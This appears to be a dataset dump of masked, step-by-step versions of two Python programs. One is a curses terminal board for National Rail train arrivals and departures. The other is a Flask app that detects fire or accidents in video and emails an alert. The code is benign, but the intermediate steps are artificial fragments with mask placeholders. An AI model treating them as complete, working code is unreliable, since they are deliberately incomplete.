stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)
stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)
services = res3.trainServices.service
i = 0
while i < len(services):
t = services[i]
if not t.platform:
t.platform = "?"
stdscr.addstr(7 + i, width - width + 5, t.sta)
stdscr.addstr(7 + i, width - width + 15, t.origin.location[0].locationName,
curses.color_pair(2) | curses.A_BOLD)
stdscr.addstr(7 + i, width - 25, t.platform)
if t.eta != "On time":
stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)
else:
stdscr.addstr(7 + i, width - 15, t.eta)
i += 1
stdscr.refresh()
curses.wrapper(main)
|
flexible
|
{
"blob_id": "302634b93725ceb9333e236021cbb64e023ff798",
"index": 2135,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif LDB_TOKEN == '':\n raise Exception(\n 'Please configure your OpenLDBWS token in getDepartureBoardExample!')\n<mask token>\n\n\ndef main(stdscr):\n res = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n curses.noecho()\n curses.cbreak()\n curses.curs_set(0)\n stdscr.erase()\n while True:\n height, width = stdscr.getmaxyx()\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.border(0)\n stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)\n stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)\n stdscr.addstr(height - 3, 6, 'Arrivals')\n stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)\n stdscr.addstr(height - 3, 19, 'Departures')\n stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)\n stdscr.addstr(height - 2, 6, 'Quit')\n stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')\n stdscr.addstr(1, 2, 'Train info powered by National Rail')\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)\n stdscr.refresh()\n stdscr.refresh()\n key = stdscr.getch()\n if key == ord('q'):\n break\n elif key == ord('d'):\n res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Departure's from \" + res2.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res2.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.std)\n stdscr.addstr(7 + i, width - width + 15, t.destination.\n location[0].locationName, curses.color_pair(2) | curses\n .A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.etd != 'On time':\n stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.etd)\n i += 1\n elif key == ord('a'):\n res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Arrivals's at \" + res3.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res3.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.sta)\n stdscr.addstr(7 + i, width - width + 15, t.origin.location[\n 0].locationName, curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.eta != 'On time':\n stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.eta)\n i += 1\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n",
"step-3": "<mask token>\nLDB_TOKEN = 'NULLTOKEN'\nWSDL = (\n 'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'\n )\nif LDB_TOKEN == '':\n raise Exception(\n 'Please configure your OpenLDBWS token in getDepartureBoardExample!')\nhistory = HistoryPlugin()\nclient = Client(wsdl=WSDL, plugins=[history])\nheader = xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken', xsd.\n ComplexType([xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue', xsd.\n String())]))\nheader_value = header(TokenValue=LDB_TOKEN)\n\n\ndef main(stdscr):\n res = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n curses.noecho()\n curses.cbreak()\n curses.curs_set(0)\n stdscr.erase()\n while True:\n height, width = stdscr.getmaxyx()\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.border(0)\n stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)\n stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)\n stdscr.addstr(height - 3, 6, 'Arrivals')\n stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)\n stdscr.addstr(height - 3, 19, 'Departures')\n stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)\n stdscr.addstr(height - 2, 6, 'Quit')\n stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')\n stdscr.addstr(1, 2, 'Train info powered by National Rail')\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)\n stdscr.refresh()\n stdscr.refresh()\n key = stdscr.getch()\n if key == ord('q'):\n break\n elif key == ord('d'):\n res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Departure's from \" + res2.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res2.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.std)\n stdscr.addstr(7 + i, width - width + 15, t.destination.\n location[0].locationName, curses.color_pair(2) | curses\n .A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.etd != 'On time':\n stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.etd)\n i += 1\n elif key == ord('a'):\n res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Arrivals's at \" + res3.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res3.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not 
t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.sta)\n stdscr.addstr(7 + i, width - width + 15, t.origin.location[\n 0].locationName, curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.eta != 'On time':\n stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.eta)\n i += 1\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n",
"step-4": "import curses\nfrom zeep import Client\nfrom zeep import xsd\nfrom zeep.plugins import HistoryPlugin\nimport time\nfrom datetime import datetime\nimport os\nLDB_TOKEN = 'NULLTOKEN'\nWSDL = (\n 'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'\n )\nif LDB_TOKEN == '':\n raise Exception(\n 'Please configure your OpenLDBWS token in getDepartureBoardExample!')\nhistory = HistoryPlugin()\nclient = Client(wsdl=WSDL, plugins=[history])\nheader = xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken', xsd.\n ComplexType([xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue', xsd.\n String())]))\nheader_value = header(TokenValue=LDB_TOKEN)\n\n\ndef main(stdscr):\n res = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n curses.noecho()\n curses.cbreak()\n curses.curs_set(0)\n stdscr.erase()\n while True:\n height, width = stdscr.getmaxyx()\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.border(0)\n stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)\n stdscr.addstr(height - 3, 2, '[A]', curses.A_BOLD)\n stdscr.addstr(height - 3, 6, 'Arrivals')\n stdscr.addstr(height - 3, 15, '[D]', curses.A_BOLD)\n stdscr.addstr(height - 3, 19, 'Departures')\n stdscr.addstr(height - 2, 2, '[Q]', curses.A_BOLD)\n stdscr.addstr(height - 2, 6, 'Quit')\n stdscr.addstr(height - 2, width - 28, 'Version 1.0 By RaithSphere')\n stdscr.addstr(1, 2, 'Train info powered by National Rail')\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)\n stdscr.refresh()\n stdscr.refresh()\n key = stdscr.getch()\n if key == ord('q'):\n break\n elif key == ord('d'):\n res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Departure's from \" + res2.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Destination', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res2.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.std)\n stdscr.addstr(7 + i, width - width + 15, t.destination.\n location[0].locationName, curses.color_pair(2) | curses\n .A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.etd != 'On time':\n stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.etd)\n i += 1\n elif key == ord('a'):\n res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN',\n _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Arrivals's at \" + res3.locationName)\n stdscr.addstr(5, width - width + 5, 'Time', curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, 'Origin', curses.A_BOLD)\n stdscr.addstr(5, width - 25, 'Plat', curses.A_BOLD)\n stdscr.addstr(5, width - 15, 'Expected', curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n 
stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n services = res3.trainServices.service\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = '?'\n stdscr.addstr(7 + i, width - width + 5, t.sta)\n stdscr.addstr(7 + i, width - width + 15, t.origin.location[\n 0].locationName, curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.eta != 'On time':\n stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.eta)\n i += 1\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n",
"step-5": "import curses\n\nfrom zeep import Client\nfrom zeep import xsd\nfrom zeep.plugins import HistoryPlugin\nimport time\nfrom datetime import datetime\nimport os\n\nLDB_TOKEN = 'NULLTOKEN'\nWSDL = 'http://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2017-10-01'\n\nif LDB_TOKEN == '':\n raise Exception(\"Please configure your OpenLDBWS token in getDepartureBoardExample!\")\n\nhistory = HistoryPlugin()\n\nclient = Client(wsdl=WSDL, plugins=[history])\n\nheader = xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}AccessToken',\n xsd.ComplexType([\n xsd.Element(\n '{http://thalesgroup.com/RTTI/2013-11-28/Token/types}TokenValue',\n xsd.String()),\n ])\n)\nheader_value = header(TokenValue=LDB_TOKEN)\n\n\ndef main(stdscr):\n res = client.service.GetDepartureBoard(numRows=10, crs='NAN', _soapheaders=[header_value])\n curses.noecho()\n curses.cbreak()\n curses.curs_set(0)\n stdscr.erase()\n\n while True:\n\n height, width = stdscr.getmaxyx()\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.border(0)\n stdscr.hline(height - 4, 1, curses.ACS_BSBS, width - 2)\n stdscr.addstr(height - 3, 2, \"[A]\", curses.A_BOLD)\n stdscr.addstr(height - 3, 6, \"Arrivals\")\n stdscr.addstr(height - 3, 15, \"[D]\", curses.A_BOLD)\n stdscr.addstr(height - 3, 19, \"Departures\")\n stdscr.addstr(height - 2, 2, \"[Q]\", curses.A_BOLD)\n stdscr.addstr(height - 2, 6, \"Quit\")\n stdscr.addstr(height - 2, width - 28, \"Version 1.0 By RaithSphere\")\n stdscr.addstr(1, 2, \"Train info powered by National Rail\")\n stdscr.addstr(1, width - 10, datetime.now().strftime('%H:%M:%S'))\n stdscr.hline(2, 1, curses.ACS_BSBS, width - 2)\n stdscr.refresh()\n\n stdscr.refresh()\n key = stdscr.getch()\n\n if key == ord('q'):\n break\n elif key == ord('d'):\n res2 = client.service.GetDepartureBoard(numRows=10, crs='NAN', _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Departure's from \" + res2.locationName)\n stdscr.addstr(5, width - width + 5, \"Time\", curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, \"Destination\", curses.A_BOLD)\n stdscr.addstr(5, width - 25, \"Plat\", curses.A_BOLD)\n stdscr.addstr(5, width - 15, \"Expected\", curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n\n services = res2.trainServices.service\n\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = \"?\"\n stdscr.addstr(7 + i, width - width + 5, t.std)\n stdscr.addstr(7 + i, width - width + 15, t.destination.location[0].locationName,\n curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.etd != \"On time\":\n stdscr.addstr(7 + i, width - 15, t.etd, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.etd)\n i += 1\n\n elif key == ord('a'):\n res3 = client.service.GetArrivalBoard(numRows=10, crs='NAN', _soapheaders=[header_value])\n stdscr.erase()\n stdscr.border(0)\n stdscr.addstr(3, 2, \"Arrivals's at \" + res3.locationName)\n stdscr.addstr(5, width - width + 5, \"Time\", curses.A_BOLD)\n stdscr.addstr(5, width - width + 15, \"Origin\", curses.A_BOLD)\n stdscr.addstr(5, width - 25, \"Plat\", curses.A_BOLD)\n stdscr.addstr(5, width - 15, \"Expected\", curses.A_BOLD)\n stdscr.hline(6, width - width + 5, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - width + 15, curses.ACS_BSBS, 11)\n 
stdscr.hline(6, width - 25, curses.ACS_BSBS, 4)\n stdscr.hline(6, width - 15, curses.ACS_BSBS, 8)\n\n services = res3.trainServices.service\n\n i = 0\n while i < len(services):\n t = services[i]\n if not t.platform:\n t.platform = \"?\"\n stdscr.addstr(7 + i, width - width + 5, t.sta)\n stdscr.addstr(7 + i, width - width + 15, t.origin.location[0].locationName,\n curses.color_pair(2) | curses.A_BOLD)\n stdscr.addstr(7 + i, width - 25, t.platform)\n if t.eta != \"On time\":\n stdscr.addstr(7 + i, width - 15, t.eta, curses.A_STANDOUT)\n else:\n stdscr.addstr(7 + i, width - 15, t.eta)\n i += 1\n\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/' + request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)
print('[INFO] loading model and label binarizer...')
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, 'rb').read())
mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')
Q = deque(maxlen=SIZE)
vs = cv2.VideoCapture(INPUT_VIDEO)
writer = None
W, H = None, None
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ''
que = deque()
while True:
grabbed, frame = vs.read()
count += 1.0
if not grabbed:
break
if W is None or H is None:
H, W = frame.shape[:2]
output = frame.copy()
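            # resize to the network input size and subtract the ImageNet RGB
            # mean (the [::1] below is a no-op copy, so the order stays RGB)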
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype('float32')
frame -= mean
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
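            # Sliding-window vote: keep the last 30 frame-level labels and
            # treat the clip as an anomaly only when more than 20 of them are
            # 'fire' or 'accident', which filters out one-off misdetections.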
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count('fire') + que.count('accident')
if que.count('fire') > que.count('accident'):
caseDetect = 'fire'
else:
caseDetect = 'accident'
text = 'Alert!!: {}'.format(label)
alert = ['fire', 'accident']
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.
FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
elif flag == 1:
end_frame = count - 10
flag = 2
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True
)
writer.write(output)
cv2.imshow('Output', output)
key = cv2.waitKey(1) & 255
if key == ord('q'):
break
if annotation != '':
status = sendmail('[email protected]',
'Anomaly Detected!!!', 'yes')
status = status['email_status']
print('count: {}'.format(count))
print('[INFO] cleaning up...')
writer.release()
vs.release()
start_frame = start_frame // 30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count,
start_time=start_frame, end_time=end_frame, status=status)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/' + request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)
print('[INFO] loading model and label binarizer...')
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, 'rb').read())
mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')
Q = deque(maxlen=SIZE)
vs = cv2.VideoCapture(INPUT_VIDEO)
writer = None
W, H = None, None
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ''
que = deque()
while True:
grabbed, frame = vs.read()
count += 1.0
if not grabbed:
break
if W is None or H is None:
H, W = frame.shape[:2]
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype('float32')
frame -= mean
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count('fire') + que.count('accident')
if que.count('fire') > que.count('accident'):
caseDetect = 'fire'
else:
caseDetect = 'accident'
text = 'Alert!!: {}'.format(label)
alert = ['fire', 'accident']
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.
FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
elif flag == 1:
end_frame = count - 10
flag = 2
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True
)
writer.write(output)
cv2.imshow('Output', output)
key = cv2.waitKey(1) & 255
if key == ord('q'):
break
if annotation != '':
status = sendmail('[email protected]',
'Anomaly Detected!!!', 'yes')
status = status['email_status']
print('count: {}'.format(count))
print('[INFO] cleaning up...')
writer.release()
vs.release()
start_frame = start_frame // 30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count,
start_time=start_frame, end_time=end_frame, status=status)
if __name__ == '__main__':
app.run(debug=False)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/' + request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)
print('[INFO] loading model and label binarizer...')
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, 'rb').read())
mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')
Q = deque(maxlen=SIZE)
vs = cv2.VideoCapture(INPUT_VIDEO)
writer = None
W, H = None, None
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ''
que = deque()
while True:
grabbed, frame = vs.read()
count += 1.0
if not grabbed:
break
if W is None or H is None:
H, W = frame.shape[:2]
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype('float32')
frame -= mean
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count('fire') + que.count('accident')
if que.count('fire') > que.count('accident'):
caseDetect = 'fire'
else:
caseDetect = 'accident'
text = 'Alert!!: {}'.format(label)
alert = ['fire', 'accident']
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.
FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
elif flag == 1:
end_frame = count - 10
flag = 2
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True
)
writer.write(output)
cv2.imshow('Output', output)
key = cv2.waitKey(1) & 255
if key == ord('q'):
break
if annotation != '':
status = sendmail('[email protected]',
'Anomaly Detected!!!', 'yes')
status = status['email_status']
print('count: {}'.format(count))
print('[INFO] cleaning up...')
writer.release()
vs.release()
start_frame = start_frame // 30
end_frame = end_frame // 30
if flag == 1:
end_frame = count
end_frame = end_frame // 30
flag = 2
print(start_frame, end_frame)
return render_template('Result1.html', label=annotation, count=count,
start_time=start_frame, end_time=end_frame, status=status)
if __name__ == '__main__':
app.run(debug=False)
<|reserved_special_token_1|>
from tensorflow.keras.models import load_model
from collections import deque
import numpy as np
import argparse
from mail import sendmail
import pickle
import imutils
import cv2
import datetime
import time
from flask import Flask, render_template, request
app = Flask(__name__)
@app.route('/')
def index():
return render_template('Main_page.html')
@app.route('/prediction.html')
def predict():
return render_template('prediction.html')
@app.route('/About_us.html')
def about_us():
return render_template('About_us.html')
@app.route('/Result1.html', methods=['POST'])
def Result1():
global annotation
if request.method == 'POST':
MODEL_PATH = 'model/final.model'
PICKLE_PATH = 'model/final.pickle'
INPUT_VIDEO = request.form['inp_video']
out = INPUT_VIDEO.split('.')
INPUT_VIDEO = 'example_clips/' + request.form['inp_video']
out = out[0]
OUTPUT_VIDEO = 'output/' + out + '.avi'
SIZE = 128
print(MODEL_PATH, PICKLE_PATH, INPUT_VIDEO, OUTPUT_VIDEO, SIZE)
print('[INFO] loading model and label binarizer...')
model = load_model(MODEL_PATH)
lb = pickle.loads(open(PICKLE_PATH, 'rb').read())
mean = np.array([123.68, 116.779, 103.939][::1], dtype='float32')
Q = deque(maxlen=SIZE)
vs = cv2.VideoCapture(INPUT_VIDEO)
writer = None
W, H = None, None
count = 0.0
flag = 0
start_frame = 0
end_frame = 0
status = {}
annotation = ''
que = deque()
while True:
grabbed, frame = vs.read()
count += 1.0
if not grabbed:
break
if W is None or H is None:
H, W = frame.shape[:2]
output = frame.copy()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = cv2.resize(frame, (224, 224)).astype('float32')
frame -= mean
preds = model.predict(np.expand_dims(frame, axis=0))[0]
Q.append(preds)
results = np.array(Q).mean(axis=0)
i = np.argmax(results)
label = lb.classes_[i]
if len(que) == 30:
que.popleft()
if len(que) != 30:
que.append(label)
noOfAlerts = que.count('fire') + que.count('accident')
if que.count('fire') > que.count('accident'):
caseDetect = 'fire'
else:
caseDetect = 'accident'
text = 'Alert!!: {}'.format(label)
alert = ['fire', 'accident']
if len(que) == 30:
if caseDetect in alert and noOfAlerts > 20:
cv2.putText(output, text, (35, 50), cv2.
FONT_HERSHEY_SIMPLEX, 1.25, (0, 0, 255), 5)
if flag == 0:
annotation = caseDetect
start_frame = count - 20
flag = 1
elif flag == 1:
end_frame = count - 10
flag = 2
if writer is None:
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
writer = cv2.VideoWriter(OUTPUT_VIDEO, fourcc, 30, (W, H), True
)
writer.write(output)
cv2.imshow('Output', output)
key = cv2.waitKey(1) & 255
if key == ord('q'):
break
if annotation != '':
status = sendmail('[email protected]',
'Anomaly Detected!!!', 'yes')
status = status['email_status']
